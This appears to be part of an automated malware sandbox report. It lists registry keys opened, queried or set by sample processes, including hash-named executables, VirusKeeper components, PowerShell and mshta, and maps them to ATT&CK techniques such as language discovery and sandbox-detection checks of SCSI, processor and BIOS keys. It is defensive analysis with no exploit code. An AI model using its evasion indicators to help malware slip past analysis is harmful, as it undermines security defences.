Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	vk_secad.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	vk_secad.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	vk_secad.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	vk_secad.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	vk_secad.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	vk_secad.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

6536 5780 WerFault.exe vehiculate.exe

pid	pid_target	process	target process
6536	5780	WerFault.exe	vehiculate.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

control.exeProcessWatch2.exeSetup.exevk_scanfile.exevk_watchop.exeviruskeeper.exePoWERshElL.ExEcvtres.exevksoft.exevk_oascan.exemore.com26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exemshta.exevk_scanfile.exevk_scanfile.exevk_service.exevk_planrun.exevk_scan.exe89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exevk_ss.exevk_scanint.exeSetup.exe26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exevk_run.exefsutil.exevk_scanfile.exesvchost.exesetup.tmpviruskeeper.exeRegSvcs.execmd.exevk_scanfile.exe7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exepowershell.execsc.exevk_scanfile.exevk_oascan.exe09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exevk_secad.exepowershell.exeInstallUtil.exe1918587221eb57d1b227dd6472fcf43adb642077f1a24e0f3e24b9f48e5e01b0.exevkw.exe32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exeWScript.exeVirusKeeper.exeAutoIt3.exevk_scanfile.exe869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3.exe42935d2557a1d94823d32a2d9e6017a33f961b9e672292beed123d4b41c81c20.exePO.execmd.exesetup.exe9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exevk_scanfile.exe2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exevk_service.exevk_scanint.exevehiculate.exevk_planrun.exevk_scanint.exeepistemology.exevk_scan.exevk_scanfile.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	control.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ProcessWatch2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_watchop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	viruskeeper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWERshElL.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vksoft.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_oascan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_planrun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	89257c8d1539e39a63211cdbe9436f90ed30ee944633acbb5b874c8d7dc0d888.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_ss.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanint.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fsutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	viruskeeper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7eee1eb6d127253d4b70049f7c69338287b42dfee47a3b4926e5937fd9bd6250.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_oascan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	09ea9be2d95a4e1ebbf2ca8c792e5d69daeffedda8cde261fdcbd32d2d0b5f8d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_secad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1918587221eb57d1b227dd6472fcf43adb642077f1a24e0f3e24b9f48e5e01b0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vkw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	32b786ed47a62c8c8f2332299722b31f2149cf370689691268bf88fb1dae35ea.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VirusKeeper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	869acdb8281279b9c58cf1c0bc8fc4a3b13d26c81bfa7e8970ea1991f77d32b3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	42935d2557a1d94823d32a2d9e6017a33f961b9e672292beed123d4b41c81c20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9d119e13c731d90fa65a23f934bb8d76d2d23eb444cb35b24f889cfd3bafc59e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2387dfcd993c8035b2f72ad89935d4521b294010115384aaa9cf93813f7ae4ce.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanint.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vehiculate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_planrun.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanint.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	epistemology.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vk_scanfile.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

viruskeeper.exevk_scan.exeVirusKeeper.exeviruskeeper.exevk_scan.exeProcessWatch2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	viruskeeper.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vk_scan.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	VirusKeeper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	viruskeeper.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	viruskeeper.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	viruskeeper.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vk_scan.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ProcessWatch2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vk_scan.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vk_scan.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	VirusKeeper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vk_scan.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ProcessWatch2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	viruskeeper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	VirusKeeper.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ProcessWatch2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	viruskeeper.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	vk_scan.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

javaw.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	javaw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	javaw.exe

Enumerates system info in registry 2 TTPs 18 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exemsedge.exemsedge.exejavaw.exemsedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\	javaw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	javaw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	javaw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

winver.exefsutil.execontrol.exe

description	ioc	process
Key created	\Registry\User\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	winver.exe
Key created	\Registry\User\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	fsutil.exe
Key created	\Registry\User\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	control.exe

Modifies data under HKEY_USERS 12 IoCs

Processes:

chrome.exevk_service.exevksoft.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133752885254271292"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	vk_service.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	vk_service.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	vksoft.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	vksoft.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	vksoft.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	vk_service.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	vk_service.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	vksoft.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	vksoft.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	vk_service.exe

Modifies registry class 64 IoCs

Processes:

setup.tmpExplorer.EXEmsedge.exevk_scan.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shell\Analyse antivirus avec VirusKeeper\command\ = "C:\\Program Files (x86)\\AxBx\\VirusKeeper 2024 Free Edition\\vk_scan.exe drive %1"	setup.tmp
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\MRUListEx = 080000000700000006000000050000000400000003000000020000000100000000000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\Analyse antivirus avec VirusKeeper\command	setup.tmp
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\MRUListEx = 0a00000009000000080000000700000006000000050000000400000003000000020000000100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\0	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\Analyse antivirus avec VirusKeeper	setup.tmp
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\9\NodeSlot = "15"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	msedge.exe
